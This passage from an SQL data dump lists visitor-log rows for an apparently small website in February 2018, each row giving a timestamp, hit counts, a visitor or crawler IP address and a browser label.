4.67',''),(207037,1518403983,1,1,0,0,'66.249.64.14','chrome'),(207038,1518404037,1,0,1,0,'66.249.64.13',''),(207039,1518404877,1,1,0,0,'178.154.200.28','other'),(207040,1518405885,2,0,2,0,'66.249.64.73',''),(207041,1518406067,1,1,0,0,'86.49.188.134','chrome'),(207042,1518406117,1,1,0,0,'8.29.198.26','other'),(207043,1518406488,1,1,0,0,'66.249.64.15','chrome'),(207044,1518407599,1,0,1,0,'66.249.64.71',''),(207045,1518410303,1,1,0,0,'40.77.167.135','other'),(207046,1518411121,1,1,0,0,'62.140.224.1','chrome'),(207047,1518411152,1,1,0,0,'54.165.59.7','other'),(207048,1518411861,1,0,1,0,'66.249.64.71',''),(207049,1518413475,1,1,0,0,'40.77.167.12','other'),(207050,1518413960,1,0,1,0,'66.249.64.71',''),(207051,1518415363,2,2,0,0,'91.196.177.46','chrome'),(207052,1518415644,1,0,1,0,'66.249.64.73',''),(207053,1518416092,2,2,0,0,'91.196.178.73','chrome'),(207054,1518416231,1,1,0,0,'66.249.93.204','chrome'),(207055,1518416327,1,1,0,0,'91.196.178.65','firefox'),(207056,1518416446,1,0,1,0,'66.249.64.67',''),(207057,1518416582,1,1,0,0,'40.77.167.65','other'),(207058,1518416837,1,0,1,0,'66.249.64.71',''),(207059,1518416932,2,0,2,0,'66.249.64.73',''),(207060,1518416969,1,1,0,0,'8.29.198.25','other'),(207061,1518417583,1,1,0,0,'91.196.178.94','firefox'),(207062,1518418092,1,0,1,0,'66.249.64.73',''),(207063,1518418554,1,1,0,0,'180.76.15.143','other'),(207064,1518418778,1,1,0,0,'40.77.167.12','other'),(207065,1518419012,1,1,0,0,'91.196.178.94','firefox'),(207066,1518419646,1,1,0,0,'216.244.66.237','other'),(207067,1518420207,2,2,0,0,'130.180.217.180','chrome'),(207068,1518420433,1,1,0,0,'94.180.4.105','chrome'),(207069,1518420563,1,1,0,0,'91.196.178.162','chrome'),(207070,1518420828,1,1,0,0,'37.52.23.86','firefox'),(207071,1518421087,1,0,1,0,'66.249.64.67',''),(207072,1518421245,1,1,0,0,'37.54.171.83','chrome'),(207073,1518421376,1,1,0,0,'40.77.167.135','other'),(207074,1518421739,1,1,0,0,'54.165.59.7','other'),(207075,1518422086,2,2,0,0,'91.196.178.66','chrome'),(207076,1518422348,1,1,0,0,'193.19.152.78','chrome'),(207077,1518422350,1,1,0,0,'37.53.229.52','chrome'),(207078,1518422500,1,1,0,0,'95.132.15.15','firefox'),(207079,1518423394,2,2,0,0,'195.230.119.34','chrome'),(207080,1518423843,3,3,0,0,'193.107.72.71','chrome'),(207081,1518423899,33,33,0,0,'185.208.208.198','other'),(207082,1518424733,1,1,0,0,'37.52.72.160','chrome'),(207083,1518424769,1,1,0,0,'95.132.15.15','firefox'),(207084,1518424915,2,2,0,0,'95.133.192.24','chrome'),(207085,1518425100,1,1,0,0,'91.196.178.104','chrome'),(207086,1518425610,1,0,1,0,'66.249.64.14',''),(207087,1518426503,5,5,0,0,'91.196.178.66','chrome'),(207088,1518426684,1,0,1,0,'66.249.64.13',''),(207089,1518427737,1,1,0,0,'87.250.224.46','other'),(207090,1518427802,1,1,0,0,'8.29.198.26','other'),(207091,1518428697,1,1,0,0,'95.134.97.244','chrome'),(207092,1518429524,4,4,0,0,'128.199.41.247','chrome'),(207093,1518430879,1,1,0,0,'46.161.9.39','chrome'),(207094,1518431029,1,1,0,0,'31.43.31.25','chrome'),(207095,1518431942,1,0,1,0,'66.249.64.67',''),(207096,1518432903,1,1,0,0,'91.196.178.65','chrome'),(207097,1518433120,1,1,0,0,'212.83.188.26','firefox'),(207098,1518433580,1,1,0,0,'91.196.178.162','chrome'),(207099,1518435535,1,1,0,0,'37.9.113.74','other'),(207100,1518435796,5,5,0,0,'195.201.22.194','other'),(207101,1518436293,1,1,0,0,'188.166.26.63','chrome'),(207102,1518436598,2,2,0,0,'91.196.178.167','chrome'),(207103,1518436937,1,1,0,0,'40.77.167.65','other'),(207104,1518437258,1,1,0,0,'180.76.15.27','other'),(207105,1518437343,1,1,0,0,'54.234.90.191','other'),(207106,1518437635,1,1,0,0,'94.180.4.105','chrome'),(207107,1518438651,1,1,0,0,'8.29.198.26','other'),(207108,1518438789,1,1,0,0,'66.249.64.73','chrome'),(207109,1518439487,2,2,0,0,'93.74.233.99','firefox'),(207110,1518440292,1,0,1,0,'66.249.64.67',''),(207111,1518440967,1,0,1,0,'66.249.64.71',''),(207112,1518441281,1,1,0,0,'54.234.90.191','other'),(207113,1518441870,1,1,0,0,'95.133.177.201','chrome'),(207114,1518442269,1,0,1,0,'66.249.64.13',''),(207115,1518442612,1,1,0,0,'66.249.64.13','chrome'),(207116,1518442679,2,2,0,0,'91.196.178.161','chrome'),(207117,1518443211,1,1,0,0,'178.154.171.10','other'),(207118,1518443994,1,1,0,0,'54.234.90.191','other'),(207119,1518445327,1,1,0,0,'37.9.113.138','other'),(207120,1518445331,1,1,0,0,'178.154.200.28','other'),(207121,1518445356,1,0,1,0,'66.249.64.71',''),(207122,1518445624,1,1,0,0,'125.209.235.184','other'),(207123,1518446092,1,1,0,0,'54.234.90.191','other'),(207124,1518446162,1,1,0,0,'95.46.160.252','chrome'),(207125,1518446184,4,4,0,0,'213.179.252.201','chrome'),(207126,1518446670,1,0,1,0,'66.249.70.7',''),(207127,1518446836,1,1,0,0,'95.133.192.24','chrome'),(207128,1518446863,1,1,0,0,'130.180.212.68','chrome'),(207129,1518446868,1,1,0,0,'92.112.127.108','chrome'),(207130,1518447024,1,0,1,0,'66.249.64.67',''),(207131,1518447152,1,1,0,0,'213.180.203.40','other'),(207132,1518447286,1,1,0,0,'216.244.66.237','other'),(207133,1518447424,1,1,0,0,'91.196.178.68','firefox'),(207134,1518447534,1,1,0,0,'54.165.59.7','other'),(207135,1518448030,1,1,0,0,'66.249.64.14','chrome'),(207136,1518448068,2,2,0,0,'91.196.177.15','chrome'),(207137,1518449122,1,0,1,0,'66.249.64.73',''),(207138,1518449477,1,1,0,0,'8.29.198.25','other'),(207139,1518450080,1,0,1,0,'66.249.64.73',''),(207140,1518450869,1,1,0,0,'94.180.4.105','firefox'),(207141,1518451559,1,1,0,0,'78.111.187.7','chrome'),(207142,1518451721,1,1,0,0,'66.249.64.71','chrome'),(207143,1518451895,1,1,0,0,'40.77.167.135','other'),(207144,1518451985,1,1,0,0,'162.210.196.100','other'),(207145,1518452072,1,1,0,0,'54.234.90.191','other'),(207146,1518453514,1,1,0,0,'54.234.90.191','other'),(207147,1518453780,1,1,0,0,'178.154.171.60','other'),(207148,1518454320,2,2,0,0,'91.196.178.21','chrome'),(207149,1518454599,1,1,0,0,'188.230.43.254','other'),(207150,1518454710,1,1,0,0,'54.234.90.191','other'),(207151,1518455287,1,1,0,0,'141.8.142.96','other'),(207152,1518455501,1,0,1,0,'66.249.64.67',''),(207153,1518455592,1,0,1,0,'66.249.64.15',''),(207154,1518456719,1,1,0,0,'91.196.178.11','chrome'),(207155,1518456850,1,1,0,0,'91.209.11.236','other'),(207156,1518456968,1,1,0,0,'188.230.43.254','other'),(207157,1518457471,1,1,0,0,'40.77.167.116','other'),(207158,1518458104,1,0,1,0,'66.249.64.71',''),(207159,1518458108,1,1,0,0,'40.77.167.65','other'),(207160,1518458109,1,1,0,0,'40.77.167.12','other'),(207161,1518458509,1,1,0,0,'162.210.196.98','other'),(207162,1518460135,1,0,1,0,'66.249.64.67',''),(207163,1518460317,1,1,0,0,'8.29.198.26','other'),(207164,1518460918,2,2,0,0,'91.196.178.45','chrome'),(207165,1518461206,2,2,0,0,'40.77.167.12','other'),(207166,1518461431,1,0,1,0,'66.249.64.73',''),(207167,1518461474,2,0,2,0,'66.249.64.67',''),(207168,1518461930,1,1,0,0,'216.145.5.42','firefox'),(207169,1518462515,1,0,1,0,'66.249.64.71',''),(207170,1518464944,1,0,1,0,'66.249.64.13',''),(207171,1518465219,1,1,0,0,'91.230.25.112','chrome'),(207172,1518465834,4,4,0,0,'95.132.133.107','firefox'),(207173,1518466637,1,1,0,0,'40.77.167.12','other'),(207174,1518466882,2,2,0,0,'91.196.178.164','chrome'),(207175,1518467511,1,1,0,0,'91.209.11.236','other'),(207176,1518468930,1,0,1,0,'66.249.64.15',''),(207177,1518471154,1,1,0,0,'8.29.198.27','other'),(207178,1518471650,1,1,0,0,'216.244.66.237','other'),(207179,1518471712,1,1,0,0,'217.69.133.242','other'),(207180,1518471838,1,1,0,0,'157.55.39.201','other'),(207181,1518471922,1,0,1,0,'66.249.64.73',''),(207182,1518472380,1,1,0,0,'91.209.11.236','other'),(207183,1518473314,1,1,0,0,'40.77.167.65','other'),(207184,1518473510,1,1,0,0,'40.77.167.12','other'),(207185,1518474054,1,1,0,0,'40.77.167.116','other'),(207186,1518475176,1,1,0,0,'91.209.11.236','other'),(207187,1518475320,1,1,0,0,'178.154.171.55','other'),(207188,1518475350,1,1,0,0,'141.8.142.74','other'),(207189,1518475741,1,1,0,0,'80.252.155.198','chrome'),(207190,1518476466,1,1,0,0,'188.165.4.128','firefox'),(207191,1518476627,1,0,1,0,'66.249.64.85',''),(207192,1518476874,1,1,0,0,'217.69.133.246','other'),(207193,1518478957,1,0,1,0,'66.249.64.67',''),(207194,1518479116,1,1,0,0,'188.165.4.128','firefox'),(207195,1518479788,1,1,0,0,'217.69.133.217','other'),(207196,1518480532,1,1,0,0,'5.45.207.82','other'),(207197,1518481574,1,1,0,0,'37.9.113.101','other'),(207198,1518481578,1,1,0,0,'87.250.224.96','other'),(207199,1518481743,1,1,0,0,'37.9.113.115','other'),(207200,1518481852,1,0,1,0,'66.249.64.67',''),(207201,1518482032,1,1,0,0,'8.29.198.27','other'),(207202,1518482601,1,1,0,0,'216.244.66.237','other'),(207203,1518482899,1,1,0,0,'91.209.11.236','other'),(207204,1518483645,1,1,0,0,'54.165.59.7','other'),(207205,1518484380,1,0,1,0,'66.249.64.73',''),(207206,1518484672,1,1,0,0,'37.9.113.110','other'),(207207,1518485850,2,2,0,0,'157.55.39.155','other'),(207208,1518486784,1,1,0,0,'178.154.171.60','other'),(207209,1518487599,1,1,0,0,'217.69.133.226','other'),(207210,1518488335,1,1,0,0,'5.45.207.49','other'),(207211,1518490291,1,1,0,0,'66.249.64.13','chrome'),(207212,1518490490,1,1,0,0,'193.106.30.99','firefox'),(207213,1518492179,1,1,0,0,'217.69.133.234','other'),(207214,1518492234,1,1,0,0,'5.189.153.71','other'),(207215,1518492642,1,1,0,0,'40.77.167.8','other'),(207216,1518492877,1,1,0,0,'8.29.198.25','other'),(207217,1518493877,1,1,0,0,'91.209.11.236','other'),(207218,1518495217,1,1,0,0,'178.154.171.10','other'),(207219,1518496558,1,1,0,0,'91.209.11.236','other'),(207220,1518497037,1,1,0,0,'66.249.64.67','chrome'),(207221,1518498057,1,1,0,0,'178.154.171.88','other'),(207222,1518498813,1,0,1,0,'66.249.64.71',''),(207223,1518501203,1,0,1,0,'66.249.64.71',''),(207224,1518501241,1,1,0,0,'40.77.167.8','other'),(207225,1518501769,1,1,0,0,'66.249.93.205','chrome'),(207226,1518501942,1,1,0,0,'199.30.24.41','other'),(207227,1518502820,1,0,1,0,'66.249.64.73',''),(207228,1518502851,1,1,0,0,'216.244.66.237','other'),(207229,1518503715,1,1,0,0,'8.29.198.25','other'),(207230,1518504795,4,4,0,0,'91.196.178.84','chrome'),(207231,1518505567,1,1,0,0,'178.93.31.198','chrome'),(207232,1518505927,1,1,0,0,'37.55.208.205','chrome'),(207233,1518509148,1,1,0,0,'87.250.224.77','other'),(207234,1518509907,1,1,0,0,'37.9.113.60','other'),(207235,1518510738,1,1,0,0,'94.180.150.116','msie'),(207236,1518511195,2,2,0,0,'91.196.178.161','chrome'),(207237,1518512272,1,1,0,0,'37.52.23.86','firefox'),(207238,1518512325,1,1,0,0,'91.196.177.137','firefox'),(207239,1518512645,1,1,0,0,'37.73.233.87','chrome'),(207240,1518512885,1,1,0,0,'194.44.126.70','opera'),(207241,1518513001,1,1,0,0,'13.56.229.65','chrome'),(207242,1518513839,38,38,0,0,'192.151.145.178','other'),(207243,1518514208,1,1,0,0,'93.175.236.51','chrome'),(207244,1518514546,1,1,0,0,'8.29.198.25','other'),(207245,1518514928,1,1,0,0,'37.55.208.215','firefox'),(207246,1518515689,7,7,0,0,'91.196.178.84','chrome'),(207247,1518515735,1,1,0,0,'213.179.238.214','firefox'),(207248,1518515778,1,1,0,0,'95.132.5.66','firefox'),(207249,1518516618,1,1,0,0,'46.101.16.232','chrome'),(207250,1518516840,3,3,0,0,'91.196.178.84','chrome'),(207251,1518516968,1,1,0,0,'178.154.171.60','other'),(207252,1518517055,1,1,0,0,'95.132.5.66','firefox'),(207253,1518517298,1,1,0,0,'91.209.11.236','other'),(207254,1518517813,1,1,0,0,'46.101.16.232','chrome'),(207255,1518518137,3,3,0,0,'95.132.12.135','chrome'),(207256,1518518827,1,1,0,0,'188.166.109.45','chrome'),(207257,1518518985,1,1,0,0,'46.101.16.232','chrome'),(207258,1518519221,1,1,0,0,'87.76.254.236','chrome'),(207259,1518519347,1,1,0,0,'213.108.45.138','firefox'),(207260,1518519624,1,1,0,0,'91.196.178.169','chrome'),(207261,1518519630,1,1,0,0,'54.208.102.37','other'),(207262,1518519715,1,1,0,0,'40.77.167.65','other'),(207263,1518519764,1,1,0,0,'91.209.11.236','other'),(207264,1518519810,2,2,0,0,'91.196.178.167','chrome'),(207265,1518520161,2,2,0,0,'130.180.216.86','chrome'),(207266,1518520337,1,1,0,0,'188.226.170.140','chrome'),(207267,1518520944,1,1,0,0,'91.196.178.73','chrome'),(207268,1518520948,1,1,0,0,'46.101.16.232','chrome'),(207269,1518521049,1,1,0,0,'178.154.171.88','other'),(207270,1518521563,1,1,0,0,'89.19.105.153','firefox'),(207271,1518523892,1,1,0,0,'37.54.94.121','chrome'),(207272,1518524162,1,1,0,0,'91.196.178.169','chrome'),(207273,1518524741,1,1,0,0,'213.180.203.8','other'),(207274,1518525386,1,1,0,0,'8.29.198.26','other'),(207275,1518525753,1,1,0,0,'40.77.167.9','other'),(207276,1518525945,2,2,0,0,'91.196.178.136','chrome'),(207277,1518525947,1,0,1,0,'66.249.64.67',''),(207278,1518526276,1,1,0,0,'217.69.133.60','other'),(207279,1518526753,1,1,0,0,'95.24.139.183','msie'),(207280,1518526754,1,1,0,0,'128.72.228.27','msie'),(207281,1518526755,1,1,0,0,'89.178.231.211','msie'),(207282,1518527474,1,1,0,0,'40.77.167.65','other'),(207283,1518527573,1,1,0,0,'216.244.66.237','other'),(207284,1518528007,1,1,0,0,'217.69.133.238','other'),(207285,1518528471,1,1,0,0,'91.209.11.236','other'),(207286,1518528583,1,1,0,0,'91.196.178.169','chrome'),(207287,1518529299,1,1,0,0,'91.196.178.136','chrome'),(207288,1518529362,1,1,0,0,'91.230.25.112','chrome'),(207289,1518529960,1,1,0,0,'185.182.81.68','chrome'),(207290,1518531008,2,2,0,0,'91.196.177.46','chrome'),(207291,1518531073,2,2,0,0,'91.196.178.162','chrome'),(207292,1518531086,1,1,0,0,'180.76.15.13','other'),(207293,1518531529,2,2,0,0,'178.92.141.178','chrome'),(207294,1518531721,3,3,0,0,'91.196.178.84','chrome'),(207295,1518531940,2,2,0,0,'91.196.177.46','chrome'),(207296,1518532013,2,2,0,0,'199.58.86.209','other'),(207297,1518532327,1,1,0,0,'91.196.178.166','chrome'),(207298,1518532943,3,3,0,0,'91.196.178.84','chrome'),(207299,1518533007,1,1,0,0,'193.106.30.99','firefox'),(207300,1518533043,2,2,0,0,'178.151.245.174','other'),(207301,1518533337,1,1,0,0,'54.167.66.102','other'),(207302,1518533622,1,1,0,0,'193.200.212.133','chrome'),(207303,1518533670,1,1,0,0,'66.249.64.67','chrome'),(207304,1518533985,1,1,0,0,'92.112.125.243','chrome'),(207305,1518534232,2,2,0,0,'91.196.178.84','chrome'),(207306,1518534584,1,0,1,0,'66.249.64.71',''),(207307,1518534680,1,1,0,0,'180.76.15.150','other'),(207308,1518535142,1,1,0,0,'188.230.43.254','other'),(207309,1518536224,1,1,0,0,'8.29.198.25','other'),(207310,1518536608,1,1,0,0,'54.167.66.102','other'),(207311,1518537242,1,1,0,0,'92.244.117.173','firefox'),(207312,1518537278,1,1,0,0,'188.230.43.254','other'),(207313,1518537318,1,1,0,0,'217.69.133.243','other'),(207314,1518538020,1,1,0,0,'141.8.142.74','other'),(207315,1518538458,2,2,0,0,'212.113.43.58','chrome'),(207316,1518538854,1,1,0,0,'54.167.66.102','other'),(207317,1518539342,1,1,0,0,'188.230.43.254','other'),(207318,1518539402,1,0,1,0,'66.249.64.67',''),(207319,1518540162,1,1,0,0,'40.77.167.9','other'),(207320,1518540594,1,1,0,0,'54.167.66.102','other'),(207321,1518540738,1,1,0,0,'37.73.233.87','chrome'),(207322,1518540844,1,1,0,0,'91.196.178.131','firefox'),(207323,1518541618,1,1,0,0,'78.111.186.26','firefox'),(207324,1518541740,1,1,0,0,'188.230.43.254','other'),(207325,1518543617,1,1,0,0,'95.132.60.251','firefox'),(207326,1518543767,1,0,1,0,'66.249.64.67',''),(207327,1518544144,1,1,0,0,'188.230.43.254','other'),(207328,1518544825,1,0,1,0,'66.249.64.71',''),(207329,1518544982,6,6,0,0,'204.12.226.26','other'),(207330,1518545380,1,1,0,0,'141.8.142.74','other'),(207331,1518545625,1,1,0,0,'54.167.66.102','other'),(207332,1518545980,1,1,0,0,'80.93.123.53','chrome'),(207333,1518546009,11,11,0,0,'23.237.4.26','other'),(207334,1518546027,1,1,0,0,'195.181.160.66','firefox'),(207335,1518546195,1,1,0,0,'91.196.178.89','firefox'),(207336,1518546544,1,1,0,0,'188.230.43.254','other'),(207337,1518546856,1,1,0,0,'54.167.66.102','other'),(207338,1518546891,2,2,0,0,'91.196.178.50','chrome'),(207339,1518547063,1,1,0,0,'8.29.198.25','other'),(207340,1518547498,1,1,0,0,'37.9.113.138','other'),(207341,1518547881,1,1,0,0,'54.167.66.102','other'),(207342,1518547917,1,1,0,0,'91.209.11.236','other'),(207343,1518549099,1,1,0,0,'91.209.11.236','other'),(207344,1518549961,1,1,0,0,'66.249.64.13','chrome'),(207345,1518550437,1,1,0,0,'207.46.13.168','other'),(207346,1518551050,1,1,0,0,'91.209.11.236','other'),(207347,1518551684,1,1,0,0,'217.69.133.84','other'),(207348,1518553681,1,1,0,0,'157.55.39.88','other'),(207349,1518553967,1,1,0,0,'180.76.15.10','other'),(207350,1518555265,1,1,0,0,'54.165.59.7','other'),(207351,1518555963,1,1,0,0,'207.46.13.168','other'),(207352,1518557899,1,1,0,0,'8.29.198.26','other'),(207353,1518558044,1,1,0,0,'207.46.13.168','other'),(207354,1518558088,1,1,0,0,'37.9.113.138','other'),(207355,1518558100,1,1,0,0,'157.55.39.88','other'),(207356,1518558692,1,1,0,0,'91.209.11.236','other'),(207357,1518559700,1,1,0,0,'91.209.11.236','other'),(207358,1518562683,1,1,0,0,'207.46.13.168','other'),(207359,1518562760,1,1,0,0,'157.55.39.88','other'),(207360,1518563602,12,12,0,0,'144.76.115.190','other'),(207361,1518563921,1,1,0,0,'217.69.136.206','other'),(207362,1518565837,1,1,0,0,'141.8.142.74','other'),(207363,1518566803,1,1,0,0,'91.209.11.236','other'),(207364,1518568542,1,1,0,0,'91.209.11.236','other'),(207365,1518568733,1,1,0,0,'8.29.198.25','other'),(207366,1518568968,1,0,1,0,'66.249.64.73',''),(207367,1518569820,1,0,1,0,'66.249.64.71',''),(207368,1518569962,1,1,0,0,'141.8.142.29','other'),(207369,1518571427,1,1,0,0,'141.8.142.29','other'),(207370,1518571901,1,1,0,0,'217.69.133.247','other'),(207371,1518571905,1,0,1,0,'66.249.64.81',''),(207372,1518573774,1,0,1,0,'66.249.64.85',''),(207373,1518574394,1,1,0,0,'157.55.39.88','other'),(207374,1518575453,2,2,0,0,'54.165.59.7','other'),(207375,1518575463,1,1,0,0,'216.244.66.237','other'),(207376,1518575608,1,1,0,0,'37.9.113.186','other'),(207377,1518576039,1,1,0,0,'178.154.200.8','other'),(207378,1518576158,1,1,0,0,'141.8.142.74','other'),(207379,1518576190,1,1,0,0,'37.9.113.82','other'),(207380,1518576251,1,1,0,0,'37.9.113.151','other'),(207381,1518576622,1,1,0,0,'178.154.200.28','other'),(207382,1518576839,1,1,0,0,'207.46.13.168','other'),(207383,1518577450,1,1,0,0,'178.154.171.88','other'),(207384,1518577467,1,1,0,0,'141.8.142.29','other'),(207385,1518577573,1,1,0,0,'217.69.133.12','other'),(207386,1518578473,1,1,0,0,'213.180.203.40','other'),(207387,1518578567,1,1,0,0,'213.180.203.8','other'),(207388,1518578570,1,1,0,0,'37.9.113.100','other'),(207389,1518579124,1,1,0,0,'157.55.39.88','other'),(207390,1518579572,1,1,0,0,'8.29.198.26','other'),(207391,1518579748,2,2,0,0,'5.9.79.151','other'),(207393,1518580897,1,1,0,0,'217.69.133.15','other'),(207394,1518580974,1,1,0,0,'141.8.142.74','other'),(207395,1518581174,1,1,0,0,'87.250.224.85','other'),(207396,1518581390,1,1,0,0,'178.154.171.56','other'),(207397,1518581418,1,1,0,0,'157.55.39.88','other'),(207398,1518581913,1,1,0,0,'87.250.224.66','other'),(207399,1518583823,1,1,0,0,'217.69.133.246','other'),(207400,1518583951,1,1,0,0,'217.69.136.206','other'),(207401,1518586428,2,2,0,0,'178.154.171.4','other'),(207402,1518586750,1,1,0,0,'5.45.207.30','other'),(207403,1518586819,1,1,0,0,'5.45.207.58','other'),(207404,1518586870,1,1,0,0,'5.45.207.49','other'),(207405,1518587223,1,1,0,0,'141.8.132.22','other'),(207406,1518587348,1,1,0,0,'157.55.39.235','other'),(207407,1518588203,1,1,0,0,'37.9.113.134','other'),(207408,1518588618,1,1,0,0,'157.55.39.235','other'),(207409,1518589850,1,1,0,0,'178.154.171.81','other'),(207410,1518589870,1,1,0,0,'46.42.171.152','msie'),(207411,1518589999,1,1,0,0,'54.165.59.7','other'),(207412,1518590076,1,1,0,0,'37.9.113.182','other'),(207413,1518590415,1,1,0,0,'8.29.198.27','other'),(207414,1518590557,3,3,0,0,'91.196.178.84','chrome'),(207415,1518590694,1,0,1,0,'66.249.64.13',''),(207416,1518590884,1,1,0,0,'46.42.148.253','msie'),(207417,1518591626,1,1,0,0,'178.154.171.60','other'),(207418,1518591763,2,2,0,0,'91.196.178.84','chrome'),(207419,1518591813,1,1,0,0,'37.55.24.78','chrome'),(207420,1518591960,1,1,0,0,'66.249.93.205','chrome'),(207421,1518592105,1,1,0,0,'188.255.22.220','msie'),(207422,1518592190,1,1,0,0,'37.9.113.134','other'),(207423,1518592201,1,1,0,0,'95.221.205.2','msie'),(207424,1518592552,2,2,0,0,'91.196.178.167','chrome'),(207425,1518592756,1,1,0,0,'141.8.132.22','other'),(207426,1518592884,1,1,0,0,'37.52.23.86','firefox'),(207427,1518593097,1,1,0,0,'5.45.207.58','other'),(207428,1518593100,1,1,0,0,'37.9.113.182','other'),(207429,1518593112,2,2,0,0,'91.196.178.84','chrome'),(207430,1518593493,2,2,0,0,'195.230.119.34','chrome'),(207431,1518593516,1,0,1,0,'66.249.64.67',''),(207432,1518593617,1,0,1,0,'66.249.64.73',''),(207433,1518593627,1,1,0,0,'178.137.201.145','firefox'),(207434,1518593781,1,1,0,0,'141.8.132.19','other'),(207435,1518594308,1,1,0,0,'91.196.177.46','chrome'),(207436,1518594453,1,1,0,0,'87.250.224.46','other'),(207437,1518594536,2,2,0,0,'91.196.178.84','chrome'),(207438,1518594673,1,1,0,0,'195.177.127.236','firefox'),(207439,1518595284,2,2,0,0,'37.54.225.239','chrome'),(207440,1518595415,11,11,0,0,'178.203.120.211','other'),(207441,1518595624,1,1,0,0,'37.9.113.157','other'),(207442,1518595837,1,0,1,0,'66.249.64.73',''),(207443,1518596002,1,1,0,0,'217.69.133.18','other'),(207444,1518596180,1,1,0,0,'95.134.192.209','chrome'),(207445,1518596450,1,0,1,0,'66.249.64.14',''),(207446,1518596567,1,1,0,0,'178.62.5.157','chrome'),(207447,1518596761,1,1,0,0,'94.179.43.181','chrome'),(207448,1518596802,3,3,0,0,'91.196.178.84','chrome'),(207449,1518597031,1,1,0,0,'54.226.199.183','other'),(207450,1518597283,1,1,0,0,'178.154.171.55','other'),(207451,1518597489,1,1,0,0,'178.62.5.157','chrome'),(207452,1518598106,1,1,0,0,'37.54.225.239','chrome'),(207453,1518598493,1,1,0,0,'37.9.113.151','other'),(207454,1518598616,1,1,0,0,'178.154.200.7','other'),(207455,1518598662,1,1,0,0,'37.9.113.138','other'),(207456,1518598890,1,1,0,0,'178.154.200.32','other'),(207457,1518600004,1,1,0,0,'141.8.142.96','other'),(207458,1518600018,1,0,1,0,'66.249.64.14',''),(207459,1518600510,1,1,0,0,'157.55.39.88','other'),(207460,1518600526,1,1,0,0,'31.43.22.131','chrome'),(207461,1518600898,1,1,0,0,'178.154.200.7','other'),(207462,1518601244,1,1,0,0,'8.29.198.25','other'),(207463,1518601264,2,2,0,0,'199.58.86.211','other'),(207464,1518601459,2,2,0,0,'31.43.22.131','chrome'),(207465,1518601958,1,0,1,0,'66.249.64.67',''),(207466,1518601966,1,1,0,0,'92.112.125.243','chrome'),(207467,1518602008,2,2,0,0,'208.110.93.78','other'),(207468,1518602418,1,1,0,0,'31.43.22.131','chrome'),(207469,1518602476,2,2,0,0,'91.196.178.84','chrome'),(207470,1518602507,6,6,0,0,'192.151.152.98','other'),(207471,1518603839,1,0,1,0,'66.249.64.67',''),(207472,1518604034,1,1,0,0,'5.45.207.82','other'),(207473,1518604074,10,10,0,0,'5.9.156.74','other'),(207474,1518604131,2,2,0,0,'91.196.178.84','chrome'),(207475,1518604314,1,0,1,0,'66.249.64.71',''),(207476,1518604803,1,0,1,0,'66.249.64.15',''),(207477,1518605149,2,2,0,0,'91.196.178.167','chrome'),(207478,1518605712,2,2,0,0,'91.196.178.84','chrome'),(207479,1518606224,1,1,0,0,'66.249.64.67','chrome'),(207480,1518606320,2,2,0,0,'91.196.178.1','chrome'),(207481,1518606474,1,1,0,0,'91.196.178.166','chrome'),(207482,1518607179,1,0,1,0,'66.249.64.67',''),(207483,1518607439,1,1,0,0,'37.9.113.110','other'),(207484,1518607443,1,1,0,0,'37.9.113.115','other'),(207485,1518607468,1,1,0,0,'213.180.203.7','other'),(207486,1518608214,2,2,0,0,'195.10.210.70','chrome'),(207487,1518608503,3,3,0,0,'62.80.160.205','chrome'),(207488,1518608958,2,2,0,0,'91.196.178.6','chrome'),(207489,1518609176,2,2,0,0,'141.8.142.74','other'),(207490,1518609189,1,1,0,0,'178.154.171.88','other'),(207491,1518609212,2,2,0,0,'46.174.163.134','chrome'),(207492,1518609260,1,1,0,0,'51.15.212.150','other'),(207493,1518609417,1,1,0,0,'95.108.213.24','other'),(207494,1518610683,1,1,0,0,'5.45.207.82','other'),(207495,1518610686,1,1,0,0,'87.250.224.77','other'),(207496,1518610991,2,2,0,0,'87.250.224.39','other'),(207497,1518611300,2,2,0,0,'91.196.178.68','chrome'),(207498,1518611553,1,1,0,0,'217.69.133.72','other'),(207499,1518611675,1,1,0,0,'91.196.178.166','chrome'),(207500,1518611700,1,1,0,0,'217.69.136.205','other'),(207501,1518611850,2,0,2,0,'66.249.64.67',''),(207502,1518612034,1,1,0,0,'37.9.113.114','other'),(207503,1518612058,1,1,0,0,'216.244.66.237','other'),(207504,1518612081,1,1,0,0,'8.29.198.25','other'),(207505,1518612576,2,0,2,0,'66.249.64.71',''),(207506,1518612984,1,1,0,0,'91.196.178.166','chrome'),(207507,1518613481,1,1,0,0,'178.154.171.4','other'),(207508,1518613809,1,0,1,0,'66.249.64.73',''),(207509,1518614242,1,0,1,0,'66.249.64.67',''),(207510,1518614327,1,1,0,0,'91.196.178.167','chrome'),(207511,1518615134,1,1,0,0,'54.226.199.183','other'),(207512,1518615661,3,3,0,0,'91.196.178.84','chrome'),(207513,1518615947,1,1,0,0,'37.9.113.60','other'),(207514,1518616088,1,1,0,0,'95.132.102.7','chrome'),(207515,1518616161,1,0,1,0,'66.249.64.15',''),(207516,1518616213,1,1,0,0,'91.196.178.166','other'),(207517,1518616812,1,1,0,0,'141.8.142.74','other'),(207518,1518617109,1,1,0,0,'213.180.203.7','other'),(207519,1518617113,1,1,0,0,'37.9.113.115','other'),(207521,1518617364,1,1,0,0,'178.94.58.95','firefox'),(207522,1518617613,2,2,0,0,'91.196.178.84','chrome'),(207523,1518617951,1,1,0,0,'178.154.171.10','other'),(207524,1518617961,1,1,0,0,'87.250.224.125','other'),(207525,1518617968,1,1,0,0,'193.27.80.43','chrome'),(207526,1518618549,2,2,0,0,'188.230.43.254','other'),(207527,1518619013,3,3,0,0,'91.196.178.167','chrome'),(207528,1518619274,1,1,0,0,'66.249.64.67','chrome'),(207529,1518620535,1,1,0,0,'141.8.142.74','other'),(207530,1518620645,1,1,0,0,'178.154.171.88','other'),(207531,1518620708,1,1,0,0,'95.134.97.244','chrome'),(207532,1518620855,2,2,0,0,'91.196.178.84','chrome'),(207533,1518621214,1,1,0,0,'91.196.178.92','firefox'),(207534,1518621878,1,1,0,0,'178.154.171.60','other'),(207535,1518622242,2,2,0,0,'94.179.209.74','chrome'),(207536,1518622418,1,1,0,0,'213.180.203.40','other'),(207537,1518622913,1,1,0,0,'8.29.198.27','other'),(207538,1518623021,3,3,0,0,'91.196.178.165','chrome'),(207539,1518623230,1,1,0,0,'46.161.9.39','chrome'),(207540,1518623278,6,6,0,0,'62.210.101.101','other'),(207541,1518623433,3,3,0,0,'62.210.157.95','other'),(207542,1518623484,2,2,0,0,'91.196.178.161','chrome'),(207543,1518623557,1,1,0,0,'66.249.64.73','chrome'),(207544,1518623618,1,1,0,0,'91.196.177.46','chrome'),(207545,1518623659,1,1,0,0,